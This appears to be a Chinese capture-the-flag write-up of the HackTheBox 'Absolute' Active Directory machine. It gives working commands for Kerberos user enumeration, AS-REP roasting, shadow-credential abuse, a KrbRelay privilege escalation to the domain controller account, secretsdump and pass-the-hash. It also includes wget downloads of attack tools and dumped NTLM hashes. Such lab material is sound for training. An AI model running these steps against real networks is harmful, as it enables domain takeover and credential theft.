基本信息
端口扫描 80和其他常规域端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 $ nmap -sC -sV -Pn 10.10.11.181 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-27 13:53 CST Nmap scan report for 10.10.11.181 Host is up (0.19s latency). Not shown: 988 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Absolute |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-27 12:54:19Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-12-27T12:55:14+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2022-12-27T12:55:12+00:00; +7h00m01s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-12-27T12:55:14+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.absolute.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb | Not valid before: 2022-06-09T08:14:24 |_Not valid after: 2023-06-09T08:14:24 |_ssl-date: 2022-12-27T12:55:12+00:00; +7h00m01s from scanner time. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-12-27T12:55:05 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled and required |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds
80 没什么东西:
图片exif里可以得到一些用户名:
1 2 3 4 5 James Roberts Michael Chaffrey Donald Klay Sarah Osvald Jeffer Robinson
kerberos enum 通过kerberos枚举用户名,得到的部分用户名可以和前面图片exif信息中的全名对应上,所以可以根据规则生成更全面的用户名列表:
1 2 3 4 5 6 7 ./kerbrute_linux_amd64 userenum --dc absolute.htb -d absolute.htb /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt 2022/12/06 21:13:10 > [+] VALID USERNAME: J.ROBINSON@absolute.htb 2022/12/06 21:13:10 > [+] VALID USERNAME: J.ROBERTS@absolute.htb 2022/12/06 21:13:37 > [+] VALID USERNAME: L.MOORE@absolute.htb 2022/12/06 21:14:01 > [+] VALID USERNAME: N.SMITH@absolute.htb 2022/12/06 21:15:05 > [+] VALID USERNAME: S.JOHNSON@absolute.htb
users.txt 1 2 3 4 5 6 7 8 J.ROBINSON@absolute.htb J.ROBERTS@absolute.htb L.MOORE@absolute.htb N.SMITH@absolute.htb S.JOHNSON@absolute.htb M.Chaffrey@absolute.htb D.Klay@absolute.htb S.Osvald@absolute.htb
ASREP Roasting 执行ASREP Roasting得到D.Klay的hash,破解出来密码:
1 2 3 4 5 6 7 python3 ~/Tools/impacket/examples/GetNPUsers.py absolute.htb/ -no-pass -usersfile users.txt $ krb5asrep$23 $D .Klay@absolute.htb@ABSOLUTE.HTB:b228229f01fed39738c60439ff9a3d02$84c4256df2622e0f458948f46bd593aee704c15942840a9914af5cbd8698a25f44966149d8f6834c2d888e1d96100649e26a26945cda8fe2e80cf7cb4c16cf8977a8cca3f6670509a5cfbf88f76f87b4303170fb50f1c8af41d8b8d6b9b57e2243d0f11daf0486ea8bc55e565b88caa32c36b84af7b9c51d82fe20262b3b41ae458dab1eb038b78f699c23e1d49d20fa9b88262039e23d8ffe565a33c66cee3273ff195349579757312cafeb63b25bbebcf662c26162fb3c2d4c3519fcbcd291b8120fa6eec8aba7bc0c0df993b1f7ca291f7cbe277ea90cb64af6a75bf0a9a5dd99b85b21895e5623ee663e sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Darkmoonsky248girl ($krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB)
d.klay d.klay用户请求票据,使用票据继续操作:
1 2 python3 ~/Tools/impacket/examples/getTGT.py 'absolute.htb/d.klay:Darkmoonsky248girl' export KRB5CCNAME=d.klay.ccache
使用crackmapexec去获取ldap信息,描述中得到svc_smb密码:
1 2 3 ~/Tools/CrackMapExec/cme ldap -u d.klay -d absolute.htb -k --kdcHost dc.absolute.htb --users 10.10.11.181 LDAP 10.10.11.181 389 DC svc_smb AbsoluteSMBService123!
SMB smb账户获取票据后可以访问smb:
1 2 3 impacket-getTGT 'absolute.htb/svc_smb:AbsoluteSMBService123!' export KRB5CCNAME=svc_smb.ccache impacket-smbclient svc_smb@dc.absolute.htb -k -no-pass
test.exe 获取 test.exe 文件并在连接了 vpn 的 Windows 机器上运行它。然后运行wireshark抓取请求(首先是有一些dns请求,更新hosts后能够看到LDAP请求,并且得到的用户名格式需要自己根据前面的改一下),见如下抓取信息。找到新凭证
1 absolute.htb\m.lovegod:AbsoluteLDAP2022!
m.lovegod 现在终于有一个普通用户账号了,同样请求票据进一步枚举:
1 2 impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022! export KRB5CCNAME=m.lovegod.ccache
从使用 python 的 ldap 枚举中,仅支持以下身份验证类型:GSSAPI、GSS-SPNEGO、EXTERNAL、DIGEST-MD5。然而,官方的 bloodhound-python 还不支持 kerberos。因此,改用了这个分支:
1 python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 --dns-tcp --zip -no-pass -c All
从收集到的信息中,我们了解到:m.lovegod – owns –> Group Network Audit – Generic Write –> winrm_user
winrm_user 这里云了,看wp是要自己设置一个windows server进行操作
(主要是当时BloodHound给出的是windows的命令,windows机器更方便操作,现在4.3.1之后的版本也同时有Linux利用命令了)
设置 Windows 服务器,我使用 2019
安装 ActiveDirectory 模块
为 absolute.htb 添加hosts文件条目,不要添加 dc.absolute.htb,让它自行解决。
将 Internet 时间服务器更改为 absolute.htb
Chagen网络adatpr DNS服务器到目标DC IP
然后运行以下命令,让它快点!DC 非常定期地重置 AD 值,以复制和粘贴就绪的方式准备东西
在 Windows Server 上,将用户 m.lovegod 添加到“Network Audit”组
1 2 3 4 5 6 $dc_domain ="ABSOLUTE.HTB" $SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod' , $SecPassword )Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController DC.ABSOLUTE.HTB -principalidentity "m.lovegod" Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $cred
只使用impacket的方法(不是官方版本,自己注意别把本地环境搞炸了):
1 2 3 4 5 6 7 8 # Modify group rights to all impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 # Add user to group impacket-owneredit -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.10.11.181 -action write -new-owner 'm.lovegod' -target 'Network Audit' # Check if user has been added impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action read -principal 'm.lovegod' -target 'Network Audit'
用户 m.lovegod 添加到“Network Audit”组之后,在kali上:
1 2 3 4 5 6 7 8 9 10 ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022! export KRB5CCNAME=m.lovegod.ccache python3 ~/tools/pywhisker/pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add" # 使用certipy-ad的方法,更方便 KRB5CCNAME=m.lovegod.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb ... [*] Saved credential cache to 'winrm_user.ccache' ... [*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
上面的 pywhisker 命令应该生成一个 pfx 文件和一个密码。然后使用 PKINITtools 使用 pfx 获取票证:
1 python3 ~/tools/PKINITtools/gettgtpkinit.py absolute.htb/winrm_user -cert-pfx <pfx> -pfx-pass <password> winrm_user_ccache
请注意,有一个为 winrm_user 生成的缓存。然后编辑 /etc/krb5.conf 文件以确保所有内容都在大写中。
1 2 3 4 5 6 7 8 9 # Ensure the realms in /etc/krb5.conf are in UPPERCASE [libdefaults] default_realm = ABSOLUTE.HTB [realms] ABSOLUTE.HTB = { kdc = DC.ABSOLUTE.HTB admin_server = ABSOLUTE.HTB }
使用带有 ccahe 文件的 evil-winrm 来获取 shell
1 2 export KRB5CCNAME=winrm_user_ccache ntpdate -s absolute.htb && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
user flag winrm_user桌面得到user flag:
提权信息
条件满足
基本步骤:
1 2 3 4 5 6 7 8 # download and compile the three tools and upload to the target # https://github.com/cube0x0/KrbRelay # https://github.com/antonioCoco/RunasCs # https://github.com/GhostPack/Rubeus/ wget http://<ip>/KrbRelay.exe -O .\KrbRelay.exe wget http://<ip>/RunasCs_net4.exe -O .\RunasCs_net4.exe wget http://<ip>/Rubeus.exe -O .\Rubeus.exe
使用上传的工具以 SYSTEM 身份将请求中继到 COM 服务器
1 2 3 4 5 # /network 9 C:\Users\winrm_user\Documents\RunasCs_net4.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\Users\winrm_user\Documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred" # 直接添加到管理员的方法 *Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember administrators winrm_user"
这将生成一个 Rubeus.exe 命令,执行它以获得 DC$ 的 NTLM 哈希
1 2 3 .\Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show NTLM : A7864AB463177ACB9AEC553F18F42577
记下 NTLM 哈希并使用 secretsdump 获取 DC$ 上的所有哈希
1 impacket-secretsdump -hashes :A7864AB463177ACB9AEC553F18F42577 'DC$@ABSOLUTE.HTB'
KrbRelayUp 1 2 3 4 5 *Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 ".\KrbRelayUp.exe relay -m shadowcred -cls {354ff91b-5e49-4bdc-a8e6-1cb6c6877182}" # 运行后给出的spawn中有证书和证书密码,同样再使用rubeus *Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:DC$ /certificate:MIIK******GmkJ4CAgfQ /password:"tW6@oE8=tX0@" /getcredentials /show /nowrap # 得到DC$机器账户hash ,同样的secretsdump # 也可以直接用hash 登录,普通用户是因为在受保护的用户组里,所以不能用NTLM
root flag 得到Administrator hash,PTH:
1 evil-winrm -i 10.10.11.181 -u Administrator -H 1f4a6093623653f6488d5aa24c75f2ea
hash 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4::: J.Roberts:1103:aad3b435b51404eeaad3b435b51404ee:7d6b7511772593b6d0a3d2de4630025a::: M.Chaffrey:1104:aad3b435b51404eeaad3b435b51404ee:13a699bfad06afb35fa0856f69632184::: D.Klay:1105:aad3b435b51404eeaad3b435b51404ee:21c95f594a80bf53afc78114f98fd3ab::: s.osvald:1106:aad3b435b51404eeaad3b435b51404ee:ab14438de333bf5a5283004f660879ee::: j.robinson:1107:aad3b435b51404eeaad3b435b51404ee:0c8cb4f338183e9e67bbc98231a8e59f::: n.smith:1108:aad3b435b51404eeaad3b435b51404ee:ef424db18e1ae6ba889fb12e8277797d::: m.lovegod:1109:aad3b435b51404eeaad3b435b51404ee:a22f2835442b3c4cbf5f24855d5e5c3d::: l.moore:1110:aad3b435b51404eeaad3b435b51404ee:0d4c6dccbfacbff5f8b4b31f57c528ba::: c.colt:1111:aad3b435b51404eeaad3b435b51404ee:fcad808a20e73e68ea6f55b268b48fe4::: s.johnson:1112:aad3b435b51404eeaad3b435b51404ee:b922d77d7412d1d616db10b5017f395c::: d.lemm:1113:aad3b435b51404eeaad3b435b51404ee:e16f7ab64d81a4f6fe47ca7c21d1ea40::: svc_smb:1114:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167::: svc_audit:1115:aad3b435b51404eeaad3b435b51404ee:846196aab3f1323cbcc1d8c57f79a103::: winrm_user:1116:aad3b435b51404eeaad3b435b51404ee:8738c7413a5da3bc1d083efc0ab06cb2::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577:::
参考资料
Last updated: 2023-05-29 08:50:25
